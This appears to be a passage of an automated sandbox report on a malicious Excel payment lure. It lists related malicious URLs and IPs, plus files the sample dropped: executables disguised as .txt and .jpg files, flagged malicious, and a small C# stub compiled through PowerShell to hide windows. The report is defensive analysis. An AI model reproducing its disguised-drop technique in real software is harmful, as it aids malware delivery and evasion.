                                                                                                                                                      Ekz Payment.htmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.196.146
                                                                                                                                                      http://moneypay.best/Get hashmaliciousBrowse
                                                                                                                                                      • 192.232.250.4
                                                                                                                                                      https://canningelectricinc.wordpress.com/Get hashmaliciousBrowse
                                                                                                                                                      • 192.185.188.96
                                                                                                                                                      Lmcgrath - FAX_ALNRSUW.htmlGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.29.156
                                                                                                                                                      Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 108.167.141.199
                                                                                                                                                      W08347.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.117.218
                                                                                                                                                      https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                                                                                                                                                      • 162.144.40.98
                                                                                                                                                      http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                                                                                                                                                      • 162.241.101.253
                                                                                                                                                      8G9b9FXspm.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.219.113

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6F929868-7C3F-4808-A89F-5BECCA241772
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132942
                                                                                                                                                      Entropy (8bit):5.3729511389077285
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:TcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:XrQ9DQW+zBX8P
                                                                                                                                                      MD5:BB7821180C56896263A4E3D624E9851B
                                                                                                                                                      SHA1:19BC0AE70A906B3824FDCE1B6EE108CEE340B416
                                                                                                                                                      SHA-256:6B4AD69C0F7F1259DE7C6080B980B269623849954559ED507415C0E44A799C8C
                                                                                                                                                      SHA-512:BEE6FD93C66FCADE929119B19F78D3A1235F477DD7A935DE8F4FEB8A77AAA6274B85E3BE0B6D0CBFEF6F5FB6EA8CC244A917EB649CC2959488FB2D10BDD146FA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-08T08:39:54">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):33555
                                                                                                                                                      Entropy (8bit):5.02521092294607
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:qzV3IpNBQkj2Lh4iUxtaHard3/Fn6/zFtFgVx1UtRj7vioBnPVe7oZtU9OdB5tAd:qzV3CNBQkj2Lh4iUx+qdP56/zFzgVx15
                                                                                                                                                      MD5:1EE9CD5AFE273BCB1273CD14AAD12A24
                                                                                                                                                      SHA1:FFB214AEB1C1A1B635AAD1BD60F370C24F5AE99F
                                                                                                                                                      SHA-256:2A43414EC0CAC2908FFE7F42607C18ED01AEEBEB1F39AE971ED8A29F9ACC77BC
                                                                                                                                                      SHA-512:DB88734EF7070AA26D9EB5E3A1F526E9A2D49B93A99EA89C5C47BF3003E16B5BBDA7397ABC8093D3F33D42573DD80FCDD60654C6619F5FCE4E90213746DEE6D5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: PSMODULECACHE.#....a.)...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........o.8...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet...........'...C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):19692
                                                                                                                                                      Entropy (8bit):5.612455869249591
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:ytksZVBwVq3piwlz/7iSBKngulBILC779TISJQpay6mp+4sY4:/qYwlrG4KgulBIUIRGw4
                                                                                                                                                      MD5:51DDE5249B286B52EF9229912AD98618
                                                                                                                                                      SHA1:3D916E4BB19F01F03DFB921438B1156101360FF6
                                                                                                                                                      SHA-256:E6561BE6AF9EB609C38DDDA1C826753D8CF4114B2A6368AC9630AC7E7D9AD4BC
                                                                                                                                                      SHA-512:778353F136AD386FC14D8A78138CAF28E482891B7954B31B96710596834A54722A512BF226AD9749CE205D64F4095FBF50902043348E18A98E77C45BDFCE81DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: @...e.......................!...........+............@..........H...............<@.^.L."My...:O..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].U.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1AA10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):115669
                                                                                                                                                      Entropy (8bit):7.925918362600709
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:xGjHzSJtwYold/FMeHxvPnelLDCfXoCFOhT:8DIwYoLH9PnedDCfLAhT
                                                                                                                                                      MD5:980EDB1D4E3A2AA7CC8E148A7ADD557C
                                                                                                                                                      SHA1:F1B82D663987C46715DEEACD8313E8BC6376A7DE
                                                                                                                                                      SHA-256:4708FF793B68858E5A580A5BC704A2E58D6FB6906F2A48A272AB361BC18FFB45
                                                                                                                                                      SHA-512:B46B6502C4B370110236EA1C5FDDFD22CE502869157596D39A8E958EB6ED0D6736F1E392E2025679EA4B1AC0164272036479F4A2EE144751D44159F95E2493E8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.N.1..#...\.L.H..N9......4q..l......."P.F .........?.YS.@D.]......I.......>e.&.0.A...|...........l.R8........p...hE..8.A...?..N....Ku..l...x6......v..X..T-.!.-E".../$.......%..C..p...iB....!%*.._...`..T.,....D0.M...2K18......rd...[ja...;..........t.......X.L.i.g..2.+'..(&.{W..../......G...\PW..q.FY.w.q.j.B..?.Ht....w...........]..`VQ..!..?.w......]..itF.^.....u .I.j.;.+F..?...`W..p..#.........PK..........!.;.!............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RESBD2F.tmp
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2188
                                                                                                                                                      Entropy (8bit):2.7180858502310796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pg0BC93hHIWhKoXffI+ycuZhNUvfakSHvYPNnq92pGzW9I:K0BC9RoMKgH1ul0a3Yq9h
                                                                                                                                                      MD5:1A21F29FE75C935E4D9DAB3AF862AD14
                                                                                                                                                      SHA1:1E7E91823764C94F4BA9BB133C6AC97A05B4F712
                                                                                                                                                      SHA-256:8C44258ECD4FCA0C5F85C753462B86167D32AB68670ABAD8A907D80200442160
                                                                                                                                                      SHA-512:0622D2017B70B82514213E65CB6D23C6224412FE7A202AB5AE76DAB1D9B06BE0BB2984332259FF7BCBEE417C614123AE8F1DAEEA40BC0F2DDB34E8DCBD1E4F74
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP..................q.k.>.................4.......C:\Users\user\AppData\Local\Temp\RESBD2F.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Documents.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test1.txt
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1691648
                                                                                                                                                      Entropy (8bit):7.901599109868755
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:OGs56nQsgC/2Bo5dcW/McLiyKQJpDEGKHh0jXJ:mEOIdcYfLiyKQzD9c0jZ
                                                                                                                                                      MD5:977BE4BFD3F8EBD3F7EF56DCE06046CA
                                                                                                                                                      SHA1:D79746B09430C99F01729AE6C447D54EA9434546
                                                                                                                                                      SHA-256:0ACBF142760FA262369C7DB70A8284D2320496D461D468011D5316E00A725382
                                                                                                                                                      SHA-512:029357805FB41267326313D3BC5C2770505C215261992A8B06211E5093CC89F4DED3ADD470D443273874AF5BF0E49DDFF5B86365A9504A308FA7A432E8DD8794
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.................p...P....................@.........................................................................L...P.......................................................................................t............................text...D`.......p.................. ..`.rdata..............................@..@.data...H...........................@....rsrc...............................@..@.reloc..j........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test2.gif
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PNG image data, 843 x 685, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):52573
                                                                                                                                                      Entropy (8bit):7.929770193106239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:q8as4TUSrbfoAKgxCllllllhy8PZMPAW07jI:ETUkJkllllllhyKnI
                                                                                                                                                      MD5:BD077FF603FB6873277C658C2FA9F84B
                                                                                                                                                      SHA1:2F70973669FEABE962DA03DD4F4A25CE789EF7A1
                                                                                                                                                      SHA-256:12CE388F55373DBAA49259D196B2B692EF70A2CD1999406BB46D562AA9C56168
                                                                                                                                                      SHA-512:205C3E7CB055179F24CBA13BC381A358648221A37F1F05EFFBDE91814794941FFDCFB3D41567B3E86970683180570D4CE18CE4A49EA729202A989200A91737B7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR...K.........yLb.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..ix.....|I...^.{.3.af.xMH2q..$L2..'q...c[.1.........1.*.........hA.I......b..OuUWWWW..st$.Z./..T?U.Tuw...-.]..R..... .. ..RM.px.........@Jk6.>.9<:.....N.j. .. ..z.....&O8<.;.. .....rt......l.!.. ....(..Z...... .. (....;.A..A...t.9....g.....f,..c.o~t.C..8x......9..;........../....A..A.U....?uFj..&W.o>|..'_~.%...?.${.8.~....eD*...)........mYY..ef.e.n. e4i....m...[.n.s.=...>zBk.m.8q.. .. .IS....D.Z{.w.&.P..QE....N.YY.B...+W>.8y.c..G;....t..q_.FR..........u...SO=.~...H..++...b].._.H..,......OM..*.*+....S.z]M}.CG.k.:..u..k..W....*/)_S.Fk..p...A..ARd.._..'...s....{..;5.4.px/.-.|......O|.....u4..k.......c}...t4.e/...G..=..[.=wAF.....~.O..]{{.....}....^a~...TXWYUTPT..j.....s....#.W..Zm..v..S.~...G.!.w.....*.....4..8.)*....<Q.w.&.*.....O.......)[.-.(u....[..^......B5.8...a/....>....G.Z<..'#.K..............D"g...CP.Juf^..."..S.T.468<..........ON^..J..
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1744221
                                                                                                                                                      Entropy (8bit):7.905244958740085
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:OGs56nQsgC/2Bo5dcW/McLiyKQJpDEGKHh0jXJG/I:mEOIdcYfLiyKQzD9c0jZG/I
                                                                                                                                                      MD5:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      SHA1:6B3E69CA8EB1FAB3562069DDD536E17E9FDEB065
                                                                                                                                                      SHA-256:24376FC5EB6DF0EF9DC45BF80BE3B7C5FC05451C8838A237FB755C3DDDDF6A58
                                                                                                                                                      SHA-512:92E592CE199AECBF15FCF99834BC3A9B8DCC06C74F62B8364F7E4C303C3945619CACF8C9D66F0BD229ABAAB5FCF462852FA9FCF21C6679D4EF66A1373FD774B3
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.................p...P....................@.........................................................................L...P.......................................................................................t............................text...D`.......p.................. ..`.rdata..............................@..@.data...H...........................@....rsrc...............................@..@.reloc..j........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjero14r.dsc.psm1
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 1
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqwk4ohh.b1d.ps1
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 1
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):652
                                                                                                                                                      Entropy (8bit):3.1049088739218784
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiNMUfak7YnqqHNMUYPN5Dlq5J:+RI+ycuZhNUvfakSHvYPNnqX
                                                                                                                                                      MD5:DB7FD971D76BFC3E0B0782EF9BCFDCFD
                                                                                                                                                      SHA1:8E321D7EA427122870ADE8F110A6273E241385A6
                                                                                                                                                      SHA-256:6433DE3B63669C4BE0D0CE9C5FB3513117E632E299CAA254A1EA172E680408B3
                                                                                                                                                      SHA-512:44E202D3C7AD43A0A5B65D12985A46DC85490E395D054322654D79DD511DAF2DDEB71D066A76B39F517B56808D3E5018145E7124DEA2944C1D98E99CC62E3D73
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.w.a.h.a.3.c.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.w.a.h.a.3.c.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.0.cs
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:C++ source, UTF-8 Unicode (with BOM) text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):227
                                                                                                                                                      Entropy (8bit):4.717324531992703
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:V/DsYLDS81zumJFR66rMUSRkoSdt+imlwy:V/DTLDfuCRlrMf9Amlwy
                                                                                                                                                      MD5:45B27450C87DFD52C3202A5D753ACE9D
                                                                                                                                                      SHA1:A1994630E847E7105A17D99B84C0775AD5FF3082
                                                                                                                                                      SHA-256:1D49AB035313FBF58CF764BB0C20D9A3F891AFA4D6F2493092CE39A1864A70D3
                                                                                                                                                      SHA-512:A67DD616D149E95F9303633919B47ABEE3CE091C18266C2C2B7F8CE07615BF7EABE7AB4AD60A6E24FE63E68B7EECC31F5E0CA79F7DE7DB09E38685F0999DC89F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace nATIve.{. public class Win. {. [ DllImport ( ("use" + "r32" + ".dll" ) ) ] public static extern bool ShowWindow(int handle , int state) ; .. }..}.
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):369
                                                                                                                                                      Entropy (8bit):5.242580375842531
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fd/bKzxs7+AEszIWXp+N23fd/bv:p37Lvkmb6KHcWZE85
                                                                                                                                                      MD5:0E8245CB95F40B647C9CD4210D638CCE
                                                                                                                                                      SHA1:B8E9046F358FE425A421493E157A33F5E7B250D2
                                                                                                                                                      SHA-256:5456C47D4AAF84D1D487D016271DD8100BF193D529854B59209919B482FBF9B1
                                                                                                                                                      SHA-512:C7396FCA61E8E163FED6598AEB634E44573FC93BBC2E5241407A6BA1084727EE73E385AE6468BE812AB464D57830F17D5E3A89DA87A4C0F2CEB349209BE48B7C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.0.cs"
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):2.709829994885581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:etGSI/Bepsl/d8d7itoztltkZfIZ1QoHUxbI+ycuZhNUvfakSHvYPNnq:63yuMtoxQJIlHKb1ul0a3Yq
                                                                                                                                                      MD5:EE1AC02E0555F66ACE02D9BC41202DEE
                                                                                                                                                      SHA1:90EABB4D7D17554E10F963804E362A1D5F810F8D
                                                                                                                                                      SHA-256:70942BF7DE993FFEF8AA3A32323C7CF3055BB7D7ADAC7C4436D55887EDDC10E4
                                                                                                                                                      SHA-512:B3BAABDB9A3F6A79C50352CCA26461BDFE59B094EAA6EFE5B4417C2B95D2E0E5FA34809A4FA6882543861C7AE6E3678F8C552D262D7D34A41432A6A90EE6C79B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!................~#... ...@....... ....................................@.................................$#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l.......#~..p.......#Strings....l.......#US.t.......#GUID.......H...#Blob...........G.........%3............................................................2.+...w.W.....W.......................................... 9.....P ......D.........J.....Q...D.....D...!.D.....D.............'.......9......................................."........<Module>.nwaha3c5.dll.Win.nATIve.mscorlib.System.Object.ShowWindow..ctor.handle.state.System.Runtime.CompilerSe
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.out
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):412
                                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jan 8 16:39:56 2021, atime=Fri Jan 8 16:39:56 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.668183062655162
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8YmiW4CXUAuElPCH2YgZFYC0nl+WrjAZ/2bDyLC5Lu4t2Y+xIBjKZm:8Ye4jgZ2zAZiDb87aB6m
                                                                                                                                                      MD5:05930875E1214990952104359F32266D
                                                                                                                                                      SHA1:EA0127B857448AF602FB50D19A704A93D7B7AF63
                                                                                                                                                      SHA-256:AD16089895ED495200F5E013CA60829DC3BF85D43B8051A7F714EF5EFA56EC65
                                                                                                                                                      SHA-512:DDDD3B0DF60B509F790A986D54F66F936EE3A9C49CFA7AF16707370F7AA701525835B9898F32FCB49F8FA5EE682991B14A818D1F3F5FA6659A3FD12FFC9F6A03
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: L..................F........N....-.....G....).G..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.(R.......S.......................h.a.r.d.z.....~.1.....(R....Desktop.h.......Ny.(R.......Y..............>.....Oo..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......648351...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scanned_25526662-Payment.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Fri Jan 8 16:39:56 2021, atime=Fri Jan 8 16:39:56 2021, length=130560, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2250
                                                                                                                                                      Entropy (8bit):4.701797705276847
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8mRh/vcdwEZxM9B6pmRh/vcdwEZxM9B6:82/U7ZxM9K2/U7ZxM9
